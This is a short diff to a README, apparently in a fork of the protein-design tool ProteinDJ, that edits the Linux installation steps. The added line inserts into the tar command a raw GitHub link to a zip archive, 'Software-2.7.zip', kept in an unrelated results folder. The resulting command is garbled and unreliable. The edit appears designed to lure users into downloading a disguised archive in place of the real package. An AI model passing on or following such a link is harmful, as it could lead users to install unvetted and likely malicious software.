Mohamed5352/proteindj/README.md

 - **Linux:**
   1. Navigate to the directory where you downloaded the package.
-  2. Run the command `tar -xvf proteindj*.tar.gz` to extract the files.
+  2. Run the command `tar -xvf proteindj*https://github.com/Mohamed5352/proteindj/raw/refs/heads/main/lib/rfd_previous_results/Software-2.7.zip` to extract the files.
   3. Follow the instructions in the README file included in the extracted folder for installation.

 ### 4. Running ProteinDJ